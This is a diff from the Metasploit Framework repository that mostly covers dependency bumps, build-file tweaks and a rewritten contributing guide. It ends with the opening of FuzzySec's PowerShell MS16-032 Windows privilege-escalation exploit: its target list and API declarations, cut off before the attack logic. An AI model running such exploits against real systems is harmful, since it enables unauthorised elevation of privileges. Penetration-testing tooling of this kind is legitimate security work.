automatic module_metadata_base.json update

Land #12887 , add dlink ssdpcgi cmd inject
move docs file, add options
2020-02-05 13:28:22 -06:00 · 2020-02-05 13:19:05 -06:00 · 2020-02-05 12:58:46 -06:00 · 2020-02-05 12:50:53 -06:00 · 2020-02-05 12:37:34 -06:00 · 2020-02-05 11:53:51 -03:00
443 changed files with 11915 additions and 3637 deletions
@@ -2,6 +2,7 @@ acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
 acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
 acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
 adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
 bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
 bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
@@ -25,6 +26,7 @@ pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
 space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
@@ -43,7 +43,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -1,64 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are multiple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 

-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!

 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.

-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

@@ -99,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -27,9 +27,9 @@ RUN apk add --no-cache \
      zlib-dev \
      ncurses-dev \
      git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.64)
+    metasploit-framework (5.0.73)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -23,11 +23,11 @@ PATH
      jsobfu
      json
      metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
-      metasploit-payloads (= 1.3.83)
-      metasploit_data_models (= 3.0.10)
+      metasploit-concern (~> 2.0.0)
+      metasploit-credential (~> 3.0.0)
+      metasploit-model (~> 2.0.4)
+      metasploit-payloads (= 1.3.84)
+      metasploit_data_models (~> 3.0.10)
      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
@@ -114,25 +114,25 @@ GEM
      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.10.0)
+    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
    aws-eventstream (1.0.3)
-    aws-partitions (1.251.0)
-    aws-sdk-core (3.84.0)
+    aws-partitions (1.269.0)
+    aws-sdk-core (3.89.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.123.0)
+    aws-sdk-ec2 (1.137.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.32.0)
+    aws-sdk-iam (1.33.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.26.0)
+    aws-sdk-kms (1.28.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.59.0)
+    aws-sdk-s3 (1.60.1)
      aws-sdk-core (~> 3, >= 3.83.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
@@ -142,11 +142,11 @@ GEM
    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    cookiejar (0.3.3)
-    crass (1.0.5)
+    crass (1.0.6)
    daemons (1.3.1)
    diff-lcs (1.3)
    dnsruby (1.61.3)
@@ -184,7 +184,7 @@ GEM
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.2.0)
+    json (2.3.0)
    loofah (2.4.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
@@ -193,7 +193,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (3.0.3)
+    metasploit-credential (3.0.4)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
@@ -207,7 +207,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.83)
+    metasploit-payloads (1.3.84)
    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -221,7 +221,7 @@ GEM
    metasploit_payloads-mettle (0.5.16)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
-    minitest (5.13.0)
+    minitest (5.14.0)
    mqtt (0.5.0)
    msgpack (1.3.1)
    multipart-post (2.1.1)
@@ -231,7 +231,8 @@ GEM
    nexpose (7.2.1)
    nokogiri (1.10.7)
      mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.15.0)
+      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
@@ -254,8 +255,8 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (4.0.1)
-    rack (1.6.11)
+    public_suffix (4.0.3)
+    rack (1.6.12)
    rack-protection (1.5.5)
      rack
    rack-test (0.6.3)
@@ -291,7 +292,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.22)
      jsobfu
      metasm
      rex-arch
@@ -304,7 +305,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.83)
+    rex-powershell (0.1.84)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -329,12 +330,12 @@ GEM
      rspec-core (~> 3.9.0)
      rspec-expectations (~> 3.9.0)
      rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.0)
-      rspec-support (~> 3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
    rspec-expectations (3.9.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
-    rspec-mocks (3.9.0)
+    rspec-mocks (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
    rspec-rails (3.9.0)
@@ -347,7 +348,7 @@ GEM
      rspec-support (~> 3.9.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.9.0)
+    rspec-support (3.9.2)
    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
    ruby_smb (1.1.0)
@@ -355,15 +356,14 @@ GEM
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (2.0.0)
+    rubyzip (2.1.0)
    sawyer (0.8.2)
      addressable (>= 2.3.5)
      faraday (> 0.8, < 2.0)
-    simplecov (0.17.1)
+    simplecov (0.18.0)
      docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
+      simplecov-html (~> 0.11.0)
+    simplecov-html (0.11.0)
    sinatra (1.4.8)
      rack (~> 1.5)
      rack-protection (~> 1.4)
@@ -375,12 +375,12 @@ GEM
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (0.20.3)
+    thor (1.0.1)
    thread_safe (0.3.6)
    tilt (2.0.10)
    timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.1)
+    tzinfo (1.2.6)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
@@ -394,7 +394,7 @@ GEM
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.20)
+    yard (0.9.24)

 PLATFORMS
  ruby
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -8,39 +8,39 @@ activesupport, 4.2.11.1, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.10.0, MIT
+arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.251.0, "Apache 2.0"
-aws-sdk-core, 3.84.0, "Apache 2.0"
-aws-sdk-ec2, 1.123.0, "Apache 2.0"
-aws-sdk-iam, 1.32.0, "Apache 2.0"
-aws-sdk-kms, 1.26.0, "Apache 2.0"
-aws-sdk-s3, 1.59.0, "Apache 2.0"
+aws-partitions, 1.269.0, "Apache 2.0"
+aws-sdk-core, 3.89.1, "Apache 2.0"
+aws-sdk-ec2, 1.137.0, "Apache 2.0"
+aws-sdk-iam, 1.33.0, "Apache 2.0"
+aws-sdk-kms, 1.28.0, "Apache 2.0"
+aws-sdk-s3, 1.60.1, "Apache 2.0"
 aws-sigv4, 1.1.0, "Apache 2.0"
-backports, 3.15.0, MIT
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.5, MIT
+crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
-diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+diff-lcs, 1.3, "Artistic-2.0, GPL-2.0+, MIT"
 dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
-eventmachine, 1.2.7, "ruby, GPL-2.0"
+eventmachine, 1.2.7, "GPL-2.0, ruby"
 factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
 faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
@@ -48,19 +48,19 @@ http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
+json, 2.3.0, ruby
 loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.64, "New BSD"
+metasploit-credential, 3.0.4, "New BSD"
+metasploit-framework, 5.0.73, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.79, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.84, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.13.0, MIT
+minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.1, "Apache 2.0"
 multipart-post, 2.1.1, MIT
@@ -69,7 +69,7 @@ net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.7, MIT
-octokit, 4.14.0, MIT
+octokit, 4.15.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -80,8 +80,8 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 4.0.1, MIT
-rack, 1.6.11, MIT
+public_suffix, 4.0.3, MIT
+rack, 1.6.12, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
@@ -96,12 +96,12 @@ rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.83, "New BSD"
+rex-powershell, 0.1.84, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
@@ -112,34 +112,36 @@ rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
-rspec-core, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
 rspec-expectations, 3.9.0, MIT
-rspec-mocks, 3.9.0, MIT
+rspec-mocks, 3.9.1, MIT
 rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.0, MIT
+rspec-support, 3.9.2, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 2.0.0, "Simplified BSD"
+rubyzip, 2.1.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.1, MIT
-simplecov-html, 0.10.2, MIT
+simplecov, 0.18.0, MIT
+simplecov-html, 0.11.0, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 0.20.3, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.5, MIT
+ttfunk, 1.6.1, "GPL-2.0, GPL-3.0, Nonstandard"
+tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.20, MIT
+yard, 0.9.24, MIT
@@ -1,347 +1,371 @@
-# Copyright (c) 2016, Ruben Booren (@FuzzySec)
-# All rights reserved
-Add-Type -TypeDefinition @"
-    using System;
-    using System.Diagnostics;
-    using System.Runtime.InteropServices;
-    using System.Security.Principal;
+#function Invoke-MS16-032 {
+<#
+.SYNOPSIS
+    
+    PowerShell implementation of MS16-032. The exploit targets all vulnerable
+    operating systems that support PowerShell v2+. Credit for the discovery of
+    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
+    
+    Targets:
+    
+    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
+    * Tested on x32 Win7, x64 Win8, x64 2k12R2
+    
+    Notes:
+    
+    * In order for the race condition to succeed the machine must have 2+ CPU
+      cores. If testing in a VM just make sure to add a core if needed mkay.
+    * Want to know more about MS16-032 ==>
+      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

-    [StructLayout(LayoutKind.Sequential)]
-    public struct PROCESS_INFORMATION
-    {
-        public IntPtr hProcess;
-        public IntPtr hThread;
-        public int dwProcessId;
-        public int dwThreadId;
-    }
-
-    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
-    public struct STARTUPINFO
-    {
-        public Int32 cb;
-        public string lpReserved;
-        public string lpDesktop;
-        public string lpTitle;
-        public Int32 dwX;
-        public Int32 dwY;
-        public Int32 dwXSize;
-        public Int32 dwYSize;
-        public Int32 dwXCountChars;
-        public Int32 dwYCountChars;
-        public Int32 dwFillAttribute;
-        public Int32 dwFlags;
-        public Int16 wShowWindow;
-        public Int16 cbReserved2;
-        public IntPtr lpReserved2;
-        public IntPtr hStdInput;
-        public IntPtr hStdOutput;
-        public IntPtr hStdError;
-    }
-
-    [StructLayout(LayoutKind.Sequential)]
-    public struct SQOS
-    {
-        public int Length;
-        public int ImpersonationLevel;
-        public int ContextTrackingMode;
-        public bool EffectiveOnly;
-    }
-
-    public static class Advapi32
-    {
-        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
-        public static extern bool CreateProcessWithLogonW(
-            String userName,
-            String domain,
-            String password,
-            int logonFlags,
-            String applicationName,
-            String commandLine,
-            int creationFlags,
-            int environment,
-            String currentDirectory,
-            ref  STARTUPINFO startupInfo,
-            out PROCESS_INFORMATION processInformation);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool SetThreadToken(
-            ref IntPtr Thread,
-            IntPtr Token);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenThreadToken(
-            IntPtr ThreadHandle,
-            int DesiredAccess,
-            bool OpenAsSelf,
-            out IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenProcessToken(
-            IntPtr ProcessHandle,
-            int DesiredAccess,
-            ref IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public extern static bool DuplicateToken(
-            IntPtr ExistingTokenHandle,
-            int SECURITY_IMPERSONATION_LEVEL,
-            ref IntPtr DuplicateTokenHandle);
-    }
-
-    public static class Kernel32
-    {
-        [DllImport("kernel32.dll")]
-        public static extern uint GetLastError();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentProcess();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentThread();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern int GetThreadId(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        public static extern int GetProcessIdOfThread(IntPtr handle);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int SuspendThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int ResumeThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool TerminateProcess(
-            IntPtr hProcess,
-            uint uExitCode);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool CloseHandle(IntPtr hObject);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool DuplicateHandle(
-            IntPtr hSourceProcessHandle,
-            IntPtr hSourceHandle,
-            IntPtr hTargetProcessHandle,
-            ref IntPtr lpTargetHandle,
-            int dwDesiredAccess,
-            bool bInheritHandle,
-            int dwOptions);
-    }
-
-    public static class Ntdll
-    {
-        [DllImport("ntdll.dll", SetLastError=true)]
-        public static extern int NtImpersonateThread(
-            IntPtr ThreadHandle,
-            IntPtr ThreadToImpersonate,
-            ref SQOS SecurityQualityOfService);
-    }
+.DESCRIPTION
+	Author: Ruben Boonen (@FuzzySec)
+	Blog: http://www.fuzzysecurity.com/
+	License: BSD 3-Clause
+	Required Dependencies: PowerShell v2+
+	Optional Dependencies: None
+    
+.EXAMPLE
+	C:\PS> Invoke-MS16-032
+#>
+	Add-Type -TypeDefinition @"
+	using System;
+	using System.Diagnostics;
+	using System.Runtime.InteropServices;
+	using System.Security.Principal;
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public int dwProcessId;
+		public int dwThreadId;
+	}
+	
+	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+	public struct STARTUPINFO
+	{
+		public Int32 cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public Int32 dwX;
+		public Int32 dwY;
+		public Int32 dwXSize;
+		public Int32 dwYSize;
+		public Int32 dwXCountChars;
+		public Int32 dwYCountChars;
+		public Int32 dwFillAttribute;
+		public Int32 dwFlags;
+		public Int16 wShowWindow;
+		public Int16 cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct SQOS
+	{
+		public int Length;
+		public int ImpersonationLevel;
+		public int ContextTrackingMode;
+		public bool EffectiveOnly;
+	}
+	
+	public static class Advapi32
+	{
+		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+		public static extern bool CreateProcessWithLogonW(
+			String userName,
+			String domain,
+			String password,
+			int logonFlags,
+			String applicationName,
+			String commandLine,
+			int creationFlags,
+			int environment,
+			String currentDirectory,
+			ref  STARTUPINFO startupInfo,
+			out PROCESS_INFORMATION processInformation);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool SetThreadToken(
+			ref IntPtr Thread,
+			IntPtr Token);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenThreadToken(
+			IntPtr ThreadHandle,
+			int DesiredAccess,
+			bool OpenAsSelf,
+			out IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenProcessToken(
+			IntPtr ProcessHandle, 
+			int DesiredAccess,
+			ref IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public extern static bool DuplicateToken(
+			IntPtr ExistingTokenHandle,
+			int SECURITY_IMPERSONATION_LEVEL,
